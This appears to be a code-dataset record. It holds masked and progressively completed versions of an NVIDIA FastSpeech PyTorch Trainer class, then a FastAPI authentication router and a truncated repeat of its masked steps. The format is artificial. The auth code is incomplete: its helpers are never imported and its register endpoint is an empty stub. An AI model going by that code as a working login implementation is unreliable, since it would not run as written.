"step-1": "<mask token>\n\n\nclass Trainer(object):\n <mask token>\n\n def __init__(self, data_loader, model_name, model, optimizer_fn,\n final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path\n =None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',\n use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,\n pyprof_enabled=False, detect_anomaly=False, seed=None):\n self.data_loader = data_loader\n self.model_name = model_name\n self.model = model\n self.n_epochs = n_epochs\n self.save_steps = save_steps\n self.log_steps = log_steps\n self.ckpt_path = ckpt_path\n self.log_path = log_path\n self.final_steps = final_steps\n self.step = step\n self.device = device\n self.use_amp = use_amp\n self.nvprof_iter_start = nvprof_iter_start\n self.nvprof_iter_end = nvprof_iter_end\n self.pyprof_enabled = pyprof_enabled\n self.detect_anomaly = detect_anomaly\n self.model.train()\n to_device_async(self.model, self.device)\n num_param = sum(param.numel() for param in model.parameters())\n tprint('The number of {} parameters: {}'.format(self.model_name,\n num_param))\n self.optimizer = optimizer_fn(model)\n if lr_scheduler_fn:\n self.lr_scheduler = lr_scheduler_fn(self.optimizer)\n else:\n self.lr_scheduler = None\n if self.use_amp:\n from apex import amp\n self.model, self.optimizer = amp.initialize(self.model, self.\n optimizer, opt_level='O1')\n if (nvprof_iter_start and nvprof_iter_end is not None and\n pyprof_enabled):\n from apex import pyprof\n pyprof.nvtx.init()\n self.model = nn.DataParallel(self.model)\n if seed is None:\n seed = np.random.randint(2 ** 16)\n np.random.seed(seed)\n torch.manual_seed(seed)\n self.data_loader_iter = self.repeat(self.data_loader, n_epochs)\n if log_path:\n log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))\n self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)\n if self.ckpt_path:\n self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)\n pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)\n self.load()\n <mask token>\n\n @abc.abstractmethod\n def loss(self, inputs, model):\n raise NotImplemented\n <mask token>\n <mask token>\n\n def save(self):\n state_dict = {'step': self.step, 'model': self.model.state_dict(),\n 'optim': self.optimizer.state_dict()}\n torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.\n format(self.step))\n tprint('[Save] Model \"{}\". Step={}.'.format(self.model_name, self.step)\n )\n\n def load(self, load_optim=True):\n files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))\n if files_exist:\n latest_file = max(files_exist, key=os.path.getctime)\n state_dict = torch.load(latest_file)\n self.step = state_dict['step']\n self.model.load_state_dict(state_dict['model'])\n if load_optim:\n self.optimizer.load_state_dict(state_dict['optim'])\n tprint(\"[Load] Checkpoint '{}'. Step={}\".format(latest_file,\n self.step))\n else:\n tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)\n )\n\n def console_log(self, tag, loss, meta):\n msg = 'loss: {:.6f}'.format(loss)\n for key, value in meta.items():\n msg += ',\\t{}: {:.4f}'.format(key, value)\n tprint(msg)\n\n def tensorboard_log(self, tag, loss):\n self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=\n self.step)\n\n @staticmethod\n def repeat(iterable, n_repeat=None):\n cnt = 0\n while n_repeat is None or cnt < n_repeat:\n for x in iterable:\n yield x\n cnt += 1\n return StopIteration()\n",
"step-2": "<mask token>\n\n\nclass Trainer(object):\n \"\"\"\n set seed\n set n_epochs, n_steps\n save/load model\n validation\n logging\n distributed\n \"\"\"\n\n def __init__(self, data_loader, model_name, model, optimizer_fn,\n final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path\n =None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',\n use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,\n pyprof_enabled=False, detect_anomaly=False, seed=None):\n self.data_loader = data_loader\n self.model_name = model_name\n self.model = model\n self.n_epochs = n_epochs\n self.save_steps = save_steps\n self.log_steps = log_steps\n self.ckpt_path = ckpt_path\n self.log_path = log_path\n self.final_steps = final_steps\n self.step = step\n self.device = device\n self.use_amp = use_amp\n self.nvprof_iter_start = nvprof_iter_start\n self.nvprof_iter_end = nvprof_iter_end\n self.pyprof_enabled = pyprof_enabled\n self.detect_anomaly = detect_anomaly\n self.model.train()\n to_device_async(self.model, self.device)\n num_param = sum(param.numel() for param in model.parameters())\n tprint('The number of {} parameters: {}'.format(self.model_name,\n num_param))\n self.optimizer = optimizer_fn(model)\n if lr_scheduler_fn:\n self.lr_scheduler = lr_scheduler_fn(self.optimizer)\n else:\n self.lr_scheduler = None\n if self.use_amp:\n from apex import amp\n self.model, self.optimizer = amp.initialize(self.model, self.\n optimizer, opt_level='O1')\n if (nvprof_iter_start and nvprof_iter_end is not None and\n pyprof_enabled):\n from apex import pyprof\n pyprof.nvtx.init()\n self.model = nn.DataParallel(self.model)\n if seed is None:\n seed = np.random.randint(2 ** 16)\n np.random.seed(seed)\n torch.manual_seed(seed)\n self.data_loader_iter = self.repeat(self.data_loader, n_epochs)\n if log_path:\n log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))\n self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)\n if self.ckpt_path:\n self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)\n pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)\n self.load()\n\n def train(self):\n try:\n with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled\n ):\n for i in range(self.step + 1, self.final_steps + 1):\n self.step = i\n tprint('------------- TRAIN step : {} -------------'.\n format(i))\n if self.nvprof_iter_start and i == self.nvprof_iter_start:\n profiler.start()\n timer = TimeElapsed(name=\n 'Training time during profiling', format=':.6f')\n timer.start()\n with Nvtx('step #{}'.format(self.step)):\n loss, meta = self.do_step()\n if self.nvprof_iter_end and i == self.nvprof_iter_end:\n profiler.stop()\n timer.end()\n if self.lr_scheduler:\n for param_group in self.optimizer.param_groups:\n tprint('lr: {:06f}'.format(param_group['lr']))\n self.lr_scheduler.step(self.step)\n if self.step % self.log_steps == 0:\n self.log(loss, meta)\n if (self.ckpt_path and self.save_steps and i % self.\n save_steps == 0):\n self.save()\n tprint('Training has been done.')\n except StopIteration:\n tprint('Training has been done. 
(by n_epochs)')\n except KeyboardInterrupt:\n tprint('Training has been canceled.')\n\n @abc.abstractmethod\n def loss(self, inputs, model):\n raise NotImplemented\n\n def do_step(self):\n with Nvtx('data load', enabled=False):\n data = next(self.data_loader_iter)\n with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):\n with Nvtx('forward'):\n loss, meta = self.loss(data, self.model)\n self.optimizer.zero_grad()\n with Nvtx('backward'):\n if self.use_amp:\n from apex import amp\n with amp.scale_loss(loss, self.optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n loss.backward()\n with Nvtx('weight update'):\n self.optimizer.step()\n return loss, meta\n\n def log(self, loss, meta):\n self.console_log('train', loss, meta)\n if self.log_path:\n self.tensorboard_log('train', loss)\n\n def save(self):\n state_dict = {'step': self.step, 'model': self.model.state_dict(),\n 'optim': self.optimizer.state_dict()}\n torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.\n format(self.step))\n tprint('[Save] Model \"{}\". Step={}.'.format(self.model_name, self.step)\n )\n\n def load(self, load_optim=True):\n files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))\n if files_exist:\n latest_file = max(files_exist, key=os.path.getctime)\n state_dict = torch.load(latest_file)\n self.step = state_dict['step']\n self.model.load_state_dict(state_dict['model'])\n if load_optim:\n self.optimizer.load_state_dict(state_dict['optim'])\n tprint(\"[Load] Checkpoint '{}'. Step={}\".format(latest_file,\n self.step))\n else:\n tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)\n )\n\n def console_log(self, tag, loss, meta):\n msg = 'loss: {:.6f}'.format(loss)\n for key, value in meta.items():\n msg += ',\\t{}: {:.4f}'.format(key, value)\n tprint(msg)\n\n def tensorboard_log(self, tag, loss):\n self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=\n self.step)\n\n @staticmethod\n def repeat(iterable, n_repeat=None):\n cnt = 0\n while n_repeat is None or cnt < n_repeat:\n for x in iterable:\n yield x\n cnt += 1\n return StopIteration()\n",
"step-3": "<mask token>\nplt.switch_backend('Agg')\n\n\nclass Trainer(object):\n \"\"\"\n set seed\n set n_epochs, n_steps\n save/load model\n validation\n logging\n distributed\n \"\"\"\n\n def __init__(self, data_loader, model_name, model, optimizer_fn,\n final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path\n =None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',\n use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,\n pyprof_enabled=False, detect_anomaly=False, seed=None):\n self.data_loader = data_loader\n self.model_name = model_name\n self.model = model\n self.n_epochs = n_epochs\n self.save_steps = save_steps\n self.log_steps = log_steps\n self.ckpt_path = ckpt_path\n self.log_path = log_path\n self.final_steps = final_steps\n self.step = step\n self.device = device\n self.use_amp = use_amp\n self.nvprof_iter_start = nvprof_iter_start\n self.nvprof_iter_end = nvprof_iter_end\n self.pyprof_enabled = pyprof_enabled\n self.detect_anomaly = detect_anomaly\n self.model.train()\n to_device_async(self.model, self.device)\n num_param = sum(param.numel() for param in model.parameters())\n tprint('The number of {} parameters: {}'.format(self.model_name,\n num_param))\n self.optimizer = optimizer_fn(model)\n if lr_scheduler_fn:\n self.lr_scheduler = lr_scheduler_fn(self.optimizer)\n else:\n self.lr_scheduler = None\n if self.use_amp:\n from apex import amp\n self.model, self.optimizer = amp.initialize(self.model, self.\n optimizer, opt_level='O1')\n if (nvprof_iter_start and nvprof_iter_end is not None and\n pyprof_enabled):\n from apex import pyprof\n pyprof.nvtx.init()\n self.model = nn.DataParallel(self.model)\n if seed is None:\n seed = np.random.randint(2 ** 16)\n np.random.seed(seed)\n torch.manual_seed(seed)\n self.data_loader_iter = self.repeat(self.data_loader, n_epochs)\n if log_path:\n log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))\n self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)\n if self.ckpt_path:\n self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)\n pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)\n self.load()\n\n def train(self):\n try:\n with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled\n ):\n for i in range(self.step + 1, self.final_steps + 1):\n self.step = i\n tprint('------------- TRAIN step : {} -------------'.\n format(i))\n if self.nvprof_iter_start and i == self.nvprof_iter_start:\n profiler.start()\n timer = TimeElapsed(name=\n 'Training time during profiling', format=':.6f')\n timer.start()\n with Nvtx('step #{}'.format(self.step)):\n loss, meta = self.do_step()\n if self.nvprof_iter_end and i == self.nvprof_iter_end:\n profiler.stop()\n timer.end()\n if self.lr_scheduler:\n for param_group in self.optimizer.param_groups:\n tprint('lr: {:06f}'.format(param_group['lr']))\n self.lr_scheduler.step(self.step)\n if self.step % self.log_steps == 0:\n self.log(loss, meta)\n if (self.ckpt_path and self.save_steps and i % self.\n save_steps == 0):\n self.save()\n tprint('Training has been done.')\n except StopIteration:\n tprint('Training has been done. 
(by n_epochs)')\n except KeyboardInterrupt:\n tprint('Training has been canceled.')\n\n @abc.abstractmethod\n def loss(self, inputs, model):\n raise NotImplemented\n\n def do_step(self):\n with Nvtx('data load', enabled=False):\n data = next(self.data_loader_iter)\n with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):\n with Nvtx('forward'):\n loss, meta = self.loss(data, self.model)\n self.optimizer.zero_grad()\n with Nvtx('backward'):\n if self.use_amp:\n from apex import amp\n with amp.scale_loss(loss, self.optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n loss.backward()\n with Nvtx('weight update'):\n self.optimizer.step()\n return loss, meta\n\n def log(self, loss, meta):\n self.console_log('train', loss, meta)\n if self.log_path:\n self.tensorboard_log('train', loss)\n\n def save(self):\n state_dict = {'step': self.step, 'model': self.model.state_dict(),\n 'optim': self.optimizer.state_dict()}\n torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.\n format(self.step))\n tprint('[Save] Model \"{}\". Step={}.'.format(self.model_name, self.step)\n )\n\n def load(self, load_optim=True):\n files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))\n if files_exist:\n latest_file = max(files_exist, key=os.path.getctime)\n state_dict = torch.load(latest_file)\n self.step = state_dict['step']\n self.model.load_state_dict(state_dict['model'])\n if load_optim:\n self.optimizer.load_state_dict(state_dict['optim'])\n tprint(\"[Load] Checkpoint '{}'. Step={}\".format(latest_file,\n self.step))\n else:\n tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)\n )\n\n def console_log(self, tag, loss, meta):\n msg = 'loss: {:.6f}'.format(loss)\n for key, value in meta.items():\n msg += ',\\t{}: {:.4f}'.format(key, value)\n tprint(msg)\n\n def tensorboard_log(self, tag, loss):\n self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=\n self.step)\n\n @staticmethod\n def repeat(iterable, n_repeat=None):\n cnt = 0\n while n_repeat is None or cnt < n_repeat:\n for x in iterable:\n yield x\n cnt += 1\n return StopIteration()\n",
"step-4": "import abc\nimport glob\nimport pathlib\nimport numpy as np\nimport torch\nfrom tensorboardX import SummaryWriter\nimport time\nimport os\nimport matplotlib.pyplot as plt\nfrom torch import nn\nfrom fastspeech.utils.logging import tprint\nfrom fastspeech.utils.pytorch import to_device_async\nfrom fastspeech.utils.nvtx import Nvtx\nfrom fastspeech.utils.fp16 import cast_model_to_half\nimport torch.cuda.profiler as profiler\nfrom fastspeech.utils.logging import tprint\nfrom fastspeech.utils.time import TimeElapsed\nplt.switch_backend('Agg')\n\n\nclass Trainer(object):\n \"\"\"\n set seed\n set n_epochs, n_steps\n save/load model\n validation\n logging\n distributed\n \"\"\"\n\n def __init__(self, data_loader, model_name, model, optimizer_fn,\n final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path\n =None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',\n use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,\n pyprof_enabled=False, detect_anomaly=False, seed=None):\n self.data_loader = data_loader\n self.model_name = model_name\n self.model = model\n self.n_epochs = n_epochs\n self.save_steps = save_steps\n self.log_steps = log_steps\n self.ckpt_path = ckpt_path\n self.log_path = log_path\n self.final_steps = final_steps\n self.step = step\n self.device = device\n self.use_amp = use_amp\n self.nvprof_iter_start = nvprof_iter_start\n self.nvprof_iter_end = nvprof_iter_end\n self.pyprof_enabled = pyprof_enabled\n self.detect_anomaly = detect_anomaly\n self.model.train()\n to_device_async(self.model, self.device)\n num_param = sum(param.numel() for param in model.parameters())\n tprint('The number of {} parameters: {}'.format(self.model_name,\n num_param))\n self.optimizer = optimizer_fn(model)\n if lr_scheduler_fn:\n self.lr_scheduler = lr_scheduler_fn(self.optimizer)\n else:\n self.lr_scheduler = None\n if self.use_amp:\n from apex import amp\n self.model, self.optimizer = amp.initialize(self.model, self.\n optimizer, opt_level='O1')\n if (nvprof_iter_start and nvprof_iter_end is not None and\n pyprof_enabled):\n from apex import pyprof\n pyprof.nvtx.init()\n self.model = nn.DataParallel(self.model)\n if seed is None:\n seed = np.random.randint(2 ** 16)\n np.random.seed(seed)\n torch.manual_seed(seed)\n self.data_loader_iter = self.repeat(self.data_loader, n_epochs)\n if log_path:\n log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))\n self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)\n if self.ckpt_path:\n self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)\n pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)\n self.load()\n\n def train(self):\n try:\n with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled\n ):\n for i in range(self.step + 1, self.final_steps + 1):\n self.step = i\n tprint('------------- TRAIN step : {} -------------'.\n format(i))\n if self.nvprof_iter_start and i == self.nvprof_iter_start:\n profiler.start()\n timer = TimeElapsed(name=\n 'Training time during profiling', format=':.6f')\n timer.start()\n with Nvtx('step #{}'.format(self.step)):\n loss, meta = self.do_step()\n if self.nvprof_iter_end and i == self.nvprof_iter_end:\n profiler.stop()\n timer.end()\n if self.lr_scheduler:\n for param_group in self.optimizer.param_groups:\n tprint('lr: {:06f}'.format(param_group['lr']))\n self.lr_scheduler.step(self.step)\n if self.step % self.log_steps == 0:\n self.log(loss, meta)\n if (self.ckpt_path and self.save_steps and i % self.\n save_steps == 0):\n self.save()\n 
tprint('Training has been done.')\n except StopIteration:\n tprint('Training has been done. (by n_epochs)')\n except KeyboardInterrupt:\n tprint('Training has been canceled.')\n\n @abc.abstractmethod\n def loss(self, inputs, model):\n raise NotImplemented\n\n def do_step(self):\n with Nvtx('data load', enabled=False):\n data = next(self.data_loader_iter)\n with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):\n with Nvtx('forward'):\n loss, meta = self.loss(data, self.model)\n self.optimizer.zero_grad()\n with Nvtx('backward'):\n if self.use_amp:\n from apex import amp\n with amp.scale_loss(loss, self.optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n loss.backward()\n with Nvtx('weight update'):\n self.optimizer.step()\n return loss, meta\n\n def log(self, loss, meta):\n self.console_log('train', loss, meta)\n if self.log_path:\n self.tensorboard_log('train', loss)\n\n def save(self):\n state_dict = {'step': self.step, 'model': self.model.state_dict(),\n 'optim': self.optimizer.state_dict()}\n torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.\n format(self.step))\n tprint('[Save] Model \"{}\". Step={}.'.format(self.model_name, self.step)\n )\n\n def load(self, load_optim=True):\n files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))\n if files_exist:\n latest_file = max(files_exist, key=os.path.getctime)\n state_dict = torch.load(latest_file)\n self.step = state_dict['step']\n self.model.load_state_dict(state_dict['model'])\n if load_optim:\n self.optimizer.load_state_dict(state_dict['optim'])\n tprint(\"[Load] Checkpoint '{}'. Step={}\".format(latest_file,\n self.step))\n else:\n tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)\n )\n\n def console_log(self, tag, loss, meta):\n msg = 'loss: {:.6f}'.format(loss)\n for key, value in meta.items():\n msg += ',\\t{}: {:.4f}'.format(key, value)\n tprint(msg)\n\n def tensorboard_log(self, tag, loss):\n self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=\n self.step)\n\n @staticmethod\n def repeat(iterable, n_repeat=None):\n cnt = 0\n while n_repeat is None or cnt < n_repeat:\n for x in iterable:\n yield x\n cnt += 1\n return StopIteration()\n",
"step-5": "# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.\n\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the NVIDIA CORPORATION nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport abc\nimport glob\nimport pathlib\n\nimport numpy as np\nimport torch\nfrom tensorboardX import SummaryWriter\nimport time\nimport os\nimport matplotlib.pyplot as plt\nfrom torch import nn\n\nfrom fastspeech.utils.logging import tprint\nfrom fastspeech.utils.pytorch import to_device_async\nfrom fastspeech.utils.nvtx import Nvtx\nfrom fastspeech.utils.fp16 import cast_model_to_half\n\nimport torch.cuda.profiler as profiler\nfrom fastspeech.utils.logging import tprint\nfrom fastspeech.utils.time import TimeElapsed\n\nplt.switch_backend('Agg')\n\n\nclass Trainer(object):\n \"\"\"\n set seed\n set n_epochs, n_steps\n save/load model\n validation\n logging\n distributed\n \"\"\"\n\n def __init__(self, data_loader, model_name, model, optimizer_fn, final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda', use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None, pyprof_enabled=False, detect_anomaly=False, seed=None):\n self.data_loader = data_loader\n self.model_name = model_name\n self.model = model\n self.n_epochs = n_epochs\n self.save_steps = save_steps\n self.log_steps = log_steps\n self.ckpt_path = ckpt_path\n self.log_path = log_path\n self.final_steps = final_steps\n self.step = step\n self.device = device\n self.use_amp = use_amp\n self.nvprof_iter_start = nvprof_iter_start\n self.nvprof_iter_end = nvprof_iter_end\n self.pyprof_enabled = pyprof_enabled\n self.detect_anomaly = detect_anomaly\n\n # model\n self.model.train()\n to_device_async(self.model, self.device)\n num_param = sum(param.numel() for param in model.parameters())\n tprint('The number of {} parameters: {}'.format(\n self.model_name, num_param))\n\n # optimizer\n self.optimizer = optimizer_fn(model)\n\n # lr scheduler\n if lr_scheduler_fn:\n self.lr_scheduler = lr_scheduler_fn(self.optimizer)\n else:\n self.lr_scheduler = None\n\n # automatic mixed precision\n if self.use_amp:\n from apex import amp\n self.model, 
self.optimizer = amp.initialize(self.model, \n self.optimizer, \n opt_level='O1')\n\n # profile\n if nvprof_iter_start and nvprof_iter_end is not None and pyprof_enabled:\n from apex import pyprof\n pyprof.nvtx.init()\n\n # data parallel\n self.model = nn.DataParallel(self.model)\n\n # set seed\n if seed is None:\n seed = np.random.randint(2**16)\n np.random.seed(seed)\n torch.manual_seed(seed)\n\n # data loader\n self.data_loader_iter = self.repeat(self.data_loader, n_epochs)\n\n # logging\n if log_path:\n # tensorboard log path : {log_path}/YYYYMMDD-HHMMMSS\n log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))\n self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)\n\n # checkpoint path\n if self.ckpt_path:\n self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)\n pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)\n\n # load checkpoint\n self.load()\n\n def train(self):\n try:\n with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled):\n for i in range(self.step+1, self.final_steps + 1):\n self.step = i\n tprint(\"------------- TRAIN step : {} -------------\".format(i))\n\n if self.nvprof_iter_start and i == self.nvprof_iter_start:\n profiler.start()\n timer = TimeElapsed(name=\"Training time during profiling\", format=\":.6f\")\n timer.start()\n\n with Nvtx(\"step #{}\".format(self.step)):\n loss, meta = self.do_step()\n\n if self.nvprof_iter_end and i == self.nvprof_iter_end:\n profiler.stop()\n timer.end()\n \n if self.lr_scheduler:\n for param_group in self.optimizer.param_groups:\n tprint(\"lr: {:06f}\".format(param_group['lr']))\n self.lr_scheduler.step(self.step)\n\n if self.step % self.log_steps == 0:\n self.log(loss, meta)\n\n if self.ckpt_path and self.save_steps and i % self.save_steps == 0:\n self.save()\n\n tprint(\"Training has been done.\")\n except StopIteration: # done by n_epochs\n tprint(\"Training has been done. (by n_epochs)\")\n except KeyboardInterrupt:\n tprint(\"Training has been canceled.\")\n\n @abc.abstractmethod\n def loss(self, inputs, model):\n raise NotImplemented\n\n def do_step(self):\n with Nvtx(\"data load\", enabled=False):\n data = next(self.data_loader_iter)\n\n with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):\n with Nvtx(\"forward\"):\n loss, meta = self.loss(data, self.model)\n \n self.optimizer.zero_grad()\n\n with Nvtx(\"backward\"):\n if self.use_amp:\n from apex import amp\n with amp.scale_loss(loss, self.optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n loss.backward()\n\n with Nvtx(\"weight update\"):\n self.optimizer.step()\n\n return loss, meta\n\n def log(self, loss, meta):\n self.console_log('train', loss, meta)\n if self.log_path:\n self.tensorboard_log('train', loss)\n\n def save(self):\n state_dict = {\n 'step': self.step,\n 'model': self.model.state_dict(),\n 'optim': self.optimizer.state_dict(),\n }\n torch.save(state_dict, self.ckpt_path +\n '/checkpoint_{:06d}.pt'.format(self.step))\n\n tprint('[Save] Model \"{}\". Step={}.'.format(\n self.model_name, self.step))\n\n def load(self, load_optim=True):\n files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))\n if files_exist:\n # load the latest created file.\n latest_file = max(files_exist, key=os.path.getctime)\n state_dict = torch.load(latest_file)\n\n self.step = state_dict['step']\n self.model.load_state_dict(state_dict['model'])\n if load_optim:\n self.optimizer.load_state_dict(state_dict['optim'])\n\n tprint('[Load] Checkpoint \\'{}\\'. 
Step={}'.format(\n latest_file, self.step))\n else:\n tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path))\n\n def console_log(self, tag, loss, meta):\n # console logging\n msg = 'loss: {:.6f}'.format(loss)\n for key, value in meta.items():\n msg += ',\\t{}: {:.4f}'.format(key, value)\n tprint(msg)\n\n def tensorboard_log(self, tag, loss):\n self.tbwriter.add_scalar(\n '{}/loss'.format(tag), loss, global_step=self.step)\n\n @staticmethod\n def repeat(iterable, n_repeat=None):\n cnt = 0\n while n_repeat is None or cnt < n_repeat:\n for x in iterable:\n yield x\n cnt += 1\n return StopIteration()\n",
"step-ids": [
8,
12,
13,
14,
15
]
}
|
[
8,
12,
13,
14,
15
] |
import uuid
from datetime import timedelta
from fastapi import APIRouter, Depends, HTTPException, Form, Body
from fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm
from sqlalchemy.orm import Session
# dependency
from configs.config_sqlalchemy import get_db
# schema
from schema import store_schema
# NOTE: the /login route below also calls authenticate_user and
# create_access_token and reads settings.ACCESS_TOKEN_EXPIRE_MINUTES;
# those are app-level helpers defined elsewhere and are not imported here.
# define the url the client will use to access the token
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="auth/login")
# router object
router = APIRouter(
prefix="/auth",
tags=["AUTHORIZATION AND AUTHENTICATION"],
responses={
200:{'description':'Ok'},
201:{'description':'created'},
400: {"description": "Bad Request"},
404: {"description": "Not found"}
}
)
# register a new account
@router.post("/account/register",
summary='register to create a new store',
response_model=store_schema.Store,
status_code=201
)
async def account_register(
StoreName: str = Body(...),
OwnerFirstName: str = Body(...),
OwnerLastName: str = Body(...),
OwnerEmail: str = Body(...),
):
return
# account login
@router.post('/login',
summary='login to get access token',
status_code=200
)
async def login(form_data: OAuth2PasswordRequestForm = Depends(), db:Session=Depends(get_db)):
user = authenticate_user(email=form_data.username, password=form_data.password, db=db)
if not user:
raise HTTPException(
status_code=401,
detail="Incorrect username or password",
headers={"WWW-Authenticate": "Bearer"},
)
access_token_expires = timedelta(minutes=settings.ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(
data={"sub": str(user.id)}, expires_delta=access_token_expires
)
return {"access_token": access_token, "token_type": "bearer", "user":user}
|
normal
|
{
"blob_id": "64bbf2e3b961a6e0b5d7e551278bb21990df2ed9",
"index": 5526,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/account/register', summary='register to create a new store',\n response_model=store_schema.Store, status_code=201)\nasync def account_register(StoreName: str=Body(...), OwnerFirstName: str=\n Body(...), OwnerLastName: str=Body(...), OwnerEmail: str=Body(...)):\n return\n\n\[email protected]('/login', summary='login to get access token', status_code=200)\nasync def login(form_data: OAuth2PasswordRequestForm=Depends(), db: Session\n =Depends(get_db)):\n user = authenticate_user(email=form_data.username, password=form_data.\n password, db=db)\n if not user:\n raise HTTPException(status_code=401, detail=\n 'Incorrect username or password', headers={'WWW-Authenticate':\n 'Bearer'})\n access_token_expires = timedelta(minutes=settings.\n ACCESS_TOKEN_EXPIRE_MINUTES)\n access_token = create_access_token(data={'sub': str(user.id)},\n expires_delta=access_token_expires)\n return {'access_token': access_token, 'token_type': 'bearer', 'user': user}\n",
"step-3": "<mask token>\noauth2_scheme = OAuth2PasswordBearer(tokenUrl='auth/login')\nrouter = APIRouter(prefix='/auth', tags=['AUTHORIZATION AND AUTHENTICATION'\n ], responses={(200): {'description': 'Ok'}, (201): {'description':\n 'created'}, (400): {'description': 'Bad Request'}, (404): {\n 'description': 'Not found'}})\n\n\[email protected]('/account/register', summary='register to create a new store',\n response_model=store_schema.Store, status_code=201)\nasync def account_register(StoreName: str=Body(...), OwnerFirstName: str=\n Body(...), OwnerLastName: str=Body(...), OwnerEmail: str=Body(...)):\n return\n\n\[email protected]('/login', summary='login to get access token', status_code=200)\nasync def login(form_data: OAuth2PasswordRequestForm=Depends(), db: Session\n =Depends(get_db)):\n user = authenticate_user(email=form_data.username, password=form_data.\n password, db=db)\n if not user:\n raise HTTPException(status_code=401, detail=\n 'Incorrect username or password', headers={'WWW-Authenticate':\n 'Bearer'})\n access_token_expires = timedelta(minutes=settings.\n ACCESS_TOKEN_EXPIRE_MINUTES)\n access_token = create_access_token(data={'sub': str(user.id)},\n expires_delta=access_token_expires)\n return {'access_token': access_token, 'token_type': 